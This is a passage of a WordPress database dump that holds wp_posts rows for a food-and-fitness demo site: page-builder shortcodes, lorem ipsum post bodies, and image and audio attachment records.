tab_content_description=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout.\" tab_content_title=\"Fruity Breaks\" tab_image=\"3115\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Friendlier, Easier Place to Bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The friendlier, easier place to bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive \" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"Turning banking on its head\" tab_content_description=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout.\" tab_content_title=\"Natural Scent\" tab_image=\"3116\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive \" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The friendlier, easier place to make better decisions.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Friendlier, Easier Place to Bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive \" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][/qodef_tabs][/vc_column][/vc_row][vc_row content_placement=\"middle\" content_text_aligment=\"center\" simple_background_color=\"#1c1c1c\"][vc_column][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item horizontal_alignment=\"center\" item_padding=\"68px 30% 50px 30%\" item_padding_1280_1600=\"68px 23% 45px 23%\" item_padding_1024_1280=\"68px 18% 45px 18%\"][qodef_single_image enable_image_shadow=\"no\" image=\"3007\" image_size=\"full\"][vc_column_text]\n

Succulets is simply dummy text of the printing and typesetting industry lorem ipsum lorem dummy text of the printing lovely fonts and lovely.

\n[/vc_column_text][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row]','Wellness Home','','publish','closed','closed','','wellness-home','','','2018-01-24 10:22:27','2018-01-24 10:22:27','',0,'http://succulents.select-themes.com/?page_id=650',0,'page','',0),(664,1,'2018-01-24 10:52:36','2018-01-24 10:52:36','','Right Sidebar','','publish','closed','closed','','right-sidebar','','','2018-01-24 10:52:36','2018-01-24 10:52:36','',0,'http://succulents.select-themes.com/?page_id=664',0,'page','',0),(668,1,'2018-01-24 11:24:06','2018-01-24 11:24:06','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Even Cows Don’t Drink Milk','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','even-cows-dont-drink-milk','','','2018-01-24 11:24:06','2018-01-24 11:24:06','',0,'http://succulents.select-themes.com/?p=668',0,'post','',3),(670,1,'2020-04-12 07:57:39','2020-04-12 07:57:39','','working-with-dietitian-2','','inherit','open','closed','','working-with-dietitian-2','','','2020-04-12 07:57:44','2020-04-12 07:57:44','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/working-with-dietitian-2.jpg',0,'attachment','image/jpeg',0),(708,1,'2018-01-24 12:05:21','2018-01-24 12:05:21','','h4-img-2','','inherit','open','closed','','h4-img-2','','','2018-01-24 12:05:21','2018-01-24 12:05:21','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h4-img-2.jpg',0,'attachment','image/jpeg',0),(709,1,'2018-01-24 12:05:22','2018-01-24 12:05:22','','h4-img-3','','inherit','open','closed','','h4-img-3','','','2018-01-24 12:05:22','2018-01-24 12:05:22','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h4-img-3.jpg',0,'attachment','image/jpeg',0),(710,1,'2018-01-24 12:05:24','2018-01-24 12:05:24','','h4-img-4','','inherit','open','closed','','h4-img-4','','','2018-01-24 12:05:24','2018-01-24 12:05:24','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h4-img-4.jpg',0,'attachment','image/jpeg',0),(712,1,'2018-01-24 12:05:26','2018-01-24 12:05:26','','h4-img-6','','inherit','open','closed','','h4-img-6','','','2018-01-24 12:05:26','2018-01-24 12:05:26','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h4-img-6.jpg',0,'attachment','image/jpeg',0),(713,1,'2018-01-24 12:05:27','2018-01-24 12:05:27','','h4-img-7','','inherit','open','closed','','h4-img-7','','','2018-01-24 12:05:27','2018-01-24 12:05:27','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h4-img-7.jpg',0,'attachment','image/jpeg',0),(722,1,'2018-01-24 11:10:48','2018-01-24 11:10:48','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Fast Smoothie Recepies','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','fast-smoothie-recepies','','','2018-01-24 11:10:48','2018-01-24 11:10:48','',0,'http://succulents.select-themes.com/?p=722',0,'post','',3),(724,1,'2018-01-24 13:05:28','2018-01-24 13:05:28','','blog-img-2','','inherit','open','closed','','blog-img-2','','','2018-01-24 13:05:28','2018-01-24 13:05:28','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-img-2.jpg',0,'attachment','image/jpeg',0),(733,1,'2018-01-24 11:00:32','2018-01-24 11:00:32','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Lorem ipsum dolor sit amet, no quem homero ius','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','lorem-ipsum-dolor-sit-amet-no-quem-homero-ius','','','2018-01-24 11:00:32','2018-01-24 11:00:32','',0,'http://succulents.select-themes.com/?p=733',0,'post','',3),(753,1,'2018-01-24 10:00:40','2018-01-24 10:00:40','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Becoming a Vegan','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','becoming-a-vegan','','','2018-01-24 10:00:40','2018-01-24 10:00:40','',0,'http://succulents.select-themes.com/?p=753',0,'post','',3),(754,1,'2018-01-24 13:43:54','2018-01-24 13:43:54','','blog-img-3','','inherit','open','closed','','blog-img-3','','','2018-01-24 13:43:54','2018-01-24 13:43:54','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-img-3.jpg',0,'attachment','image/jpeg',0),(758,1,'2018-01-24 13:45:28','2018-01-24 13:45:28','\"Elixir\" from One Different Compilation (NUA01) by Fingers In The Noise. Released: 2011. Genre: Emotional Electronic Music.','Elixir','','inherit','open','closed','','elixir','','','2018-01-24 13:45:28','2018-01-24 13:45:28','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/Fingers-In-The-Noise-Elixir.mp3',0,'attachment','audio/mpeg',0),(762,1,'2018-01-24 08:00:18','2018-01-24 08:00:18','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Asian Veggie Cuisine','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','asian-veggie-cuisine','','','2018-01-24 08:00:18','2018-01-24 08:00:18','',0,'http://succulents.select-themes.com/?p=762',0,'post','',3),(764,1,'2018-01-24 13:49:45','2018-01-24 13:49:45','','blog-img-4','','inherit','open','closed','','blog-img-4','','','2018-01-24 13:49:45','2018-01-24 13:49:45','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-img-4.jpg',0,'attachment','image/jpeg',0),(774,1,'2018-01-24 14:02:57','2018-01-24 14:02:57','','h4-img-10','','inherit','open','closed','','h4-img-10','','','2018-01-24 14:02:57','2018-01-24 14:02:57','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h4-img-10.jpg',0,'attachment','image/jpeg',0),(778,1,'2018-01-24 14:12:33','2018-01-24 14:12:33','[vc_row][vc_column][rev_slider_vc alias=\"home5\" enable_paspartu=\"no\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" row_content_width=\"grid\" content_text_aligment=\"left\" css=\".vc_custom_1520262026416{padding-top: 117px !important;padding-bottom: 57px !important;}\"][vc_column][qodef_section_title type=\"standard\" position=\"center\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTY FOOD\" title=\"Fitness Lifestyle\"][vc_empty_space height=\"65px\"][qodef_blog_list type=\"standard\" number_of_columns=\"3\" space_between_items=\"normal\" orderby=\"date\" order=\"DESC\" image_size=\"full\" number_of_posts=\"3\" category=\"health\" excerpt_length=\"19\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519223017507{padding-top: 120px !important;padding-bottom: 120px !important;}\" parallax_background_image=\"1715\"][vc_column][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0 14% 0 0\" item_padding_680=\"0 0% 0 0\" item_padding_768_1024=\"0 8% 50px 0\"][qodef_section_title type=\"standard\" position=\"\" title_tag=\"h1\" disable_break_words=\"no\" text_tag=\"p\" text_font_weight=\"\" title=\"This is Just Running\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque tincidunt congue mi et lobortis. Proin bibendum dolor sed lobortis efficitur. Fusce dictum dapibus pulvinar. Etiam at molestie quam. \" title_color=\"#ffffff\" text_color=\"#ffffff\" text_margin=\"25\"][vc_empty_space height=\"13px\"][qodef_button text=\"view more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" margin=\"20px 0 0 0\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"0 15% 0 0\" item_padding_680_768=\"75px 15% 0 0\" item_padding_680=\"53px 0% 0 0\" item_padding_768_1024=\"0 0% 0 0\"][qodef_video_button video_image=\"811\" video_link=\"https://vimeo.com/119253217\" play_button_size=\"20\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519223458142{padding-top: 120px !important;padding-bottom: 120px !important;}\"][vc_column][qodef_tabs type=\"vertical\"][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"Who we do\" tab_content_description=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum pellentesque dignissim nisl, sed malesuada ipsum pretium eu. Mauris leo nisl, accumsan in auctor nec, facilisis quis neque. Integer tincidunt dui ac velit facilisis, pretium efficitur lorem scelerisque. \" tab_content_title=\"Pilates Everyday\" tab_image=\"4108\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Orci varius natoque penatibus et magnis.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Nam imperdiet venenatis mauris, vel dictum leo luctus non.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Maecenas quis mi egestas, volutpat dolor ultricies, vulputate.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Integer sem purus, ullamcorper scelerisque felis eu.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Aenean mi nisi, rhoncus eget pharetra non, porttitor at augue.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Proin hendrerit magna ac elit bibendum.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"We’re already there\" tab_content_description=\"Quisque vel enim aliquet risus rhoncus condimentum eget vitae leo. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent pulvinar finibus tempor. Nulla condimentum ipsum ac diam ultrices, in aliquet libero interdum.\" tab_content_title=\"Organic Soaps\" tab_image=\"4109\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Integer sem purus, ullamcorper scelerisque felis eu, tempor.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Nam imperdiet venenatis mauris, vel dictum leo luctus non.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Nam imperdiet venenatis mauris, vel dictum leo luctus non.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Orci varius natoque penatibus et magnis.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Orci varius natoque penatibus et magnis.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Proin hendrerit magna ac elit bibendum.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"The company you keep\" tab_content_description=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout. The point of using Lorem Ipsum.\" tab_content_title=\"Crossfit Practice\" tab_image=\"4110\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Integer sem purus, ullamcorper scelerisque felis eu, tempor.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Aenean mi nisi, rhoncus eget pharetra non, porttitor at augue.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Integer sem purus, ullamcorper scelerisque felis eu, tempor.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The friendlier, easier place to bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Aliquam erat volutpat. Vestibulum neque neque.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Ut ornare, magna ultrices commodo rhoncus, libero est venenatis.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"Your financial bridge\" tab_content_description=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout. The point of using Lorem Ipsum.\" tab_content_title=\"Hydrate Often\" tab_image=\"4111\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Friendlier, Easier Place to Bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\" Ut nunc mi, pulvinar vel tempor et, feugiat eu enim.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The friendlier, easier place to bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\" Suspendisse potenti. Mauris viverra est in diam sagitti.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive \" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"Quality in everything we do\" tab_content_description=\"Quisque vel enim aliquet risus rhoncus condimentum eget vitae leo. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent pulvinar finibus tempor. Nulla condimentum ipsum ac diam ultrices, in aliquet libero interdum.\" tab_content_title=\"Fruity Breaks\" tab_image=\"4112\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Friendlier, Easier Place to Bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive Attitude!\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\" Suspendisse potenti, mauris viverra est in diam sagittis lorem.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The friendlier, easier place to bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Fringilla accumsan, velit leo venenatis erat, in aliquet neque.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Aliquam consectetur, dui ac fringilla accumsan, velit leo.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"Turning banking on its head\" tab_content_description=\"Nam imperdiet venenatis mauris, vel dictum leo luctus non. Etiam blandit a dolor a placerat. Praesent ornare, elit quis rutrum tristique, diam lacus sollicitudin turpis, vitae eleifend neque dui sed nisl. In hac habitasse platea dictumst.\" tab_content_title=\"Yoga Practice\" tab_image=\"4113\"][qodef_icon_with_text type=\"icon-left\" 